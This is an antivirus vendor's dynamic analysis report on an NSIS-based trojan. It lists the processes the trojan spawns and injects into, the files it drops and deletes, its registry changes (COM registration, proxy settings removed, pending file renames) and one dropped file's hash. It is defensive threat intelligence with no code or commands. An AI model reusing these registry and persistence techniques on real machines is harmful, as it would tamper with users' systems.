Trojan.NSIS.StartPage_2a8f25cc1f – Adaware

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

Setup__2140_il2.exe:3044
sevensetup.exe:2608
583afdedde2bb_ua.exe:1576
cpSetup.exe:2892
G5wycqyxwV.exe:3900

The Trojan injects its code into the following process(es):

Setup__2140_il2.exe:896
setup.exe:1104
%original file name%.exe:3584

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process Setup__2140_il2.exe:3044 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\index[1].htm (9382 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\index[1].htm (0 bytes)

The process Setup__2140_il2.exe:896 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (7399 bytes)

The process sevensetup.exe:2608 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\inetc.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8PAU9PHE.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PXLM8U2Q.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe (253391 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss94B0.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\inetc.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe (0 bytes)

The process cpSetup.exe:2892 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\normal_bg[1].jpg (1633 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z6N4XLNR\appImg[1].jpg (4 bytes)

The process setup.exe:1104 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\spc_player.dll (64 bytes)

The process G5wycqyxwV.exe:3900 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\nsArray.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe (52926 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4673.tmp (1568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\cpSetup.exe (58228 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\1104817113 (871 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\sevensetup.exe (4705 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\NSISdl.dll (31 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4662.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\nsArray.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\1104817113 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\sevensetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\cpSetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\NSISdl.dll (0 bytes)

The process %original file name%.exe:3584 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\ItNP6AjIFY (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\G5wycqyxwV.exe (5293 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\583afdd9a9098[1].exe (3920 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\launch_reb[1].htm (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B (38534 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn28B5.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp (0 bytes)

Registry activity

The process Setup__2140_il2.exe:3044 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCR\vinyls.tramell]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
"(Default)" = "{a0e998a2-81f0-420b-a12b-563442cf5349}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
"(Default)" = "InstallerLib"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1479738615"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
"(Default)" = "vinyls.tramell.1"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]
"(Default)" = "vinyls.tramell"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"

[HKCR\vinyls.tramell.1\CLSID]
"(Default)" = "{dded0858-104b-4eec-a82e-a44b49d78594}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"(Default)" = "{A0E998A2-81F0-420B-A12B-563442CF5349}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
"(Default)" = "IBoot"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
"(Default)" = "Inst Class"

[HKCR\vinyls.tramell.1]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3A 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
"(Default)" = "1.0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "50 6C 24 3E C4 48 D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCR\vinyls.tramell\CurVer]
"(Default)" = "vinyls.tramell.1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
[HKCR\vinyls.tramell.1]
[HKCR\vinyls.tramell\CurVer]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Programmable]
[HKCR\vinyls.tramell.1\CLSID]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
[HKCR\vinyls.tramell]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable"

The process Setup__2140_il2.exe:896 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCR\vinyls.tramell]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
"(Default)" = "{a0e998a2-81f0-420b-a12b-563442cf5349}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
"(Default)" = "InstallerLib"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1479738615"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
"(Default)" = "vinyls.tramell.1"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]
"(Default)" = "vinyls.tramell"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"

[HKCR\vinyls.tramell.1\CLSID]
"(Default)" = "{dded0858-104b-4eec-a82e-a44b49d78594}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"(Default)" = "{A0E998A2-81F0-420B-A12B-563442CF5349}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
"(Default)" = "IBoot"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
"(Default)" = "Inst Class"

[HKCR\vinyls.tramell.1]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
"(Default)" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "50 6C 24 3E C4 48 D2 01"

[HKCR\vinyls.tramell\CurVer]
"(Default)" = "vinyls.tramell.1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process sevensetup.exe:2608 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "50 6C 24 3E C4 48 D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe,"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process 583afdedde2bb_ua.exe:1576 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"

The process cpSetup.exe:2892 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1480239567"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "cpSetup.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "50 6C 24 3E C4 48 D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 37 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process G5wycqyxwV.exe:3900 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe,"

The process %original file name%.exe:3584 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionTime" = "10 CC 7D 3D C4 48 D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "10 CC 7D 3D C4 48 D2 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5	File path
ce4b14250ff2c67d88aea6a5dc084652	c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\583afdd9a9098[1].exe
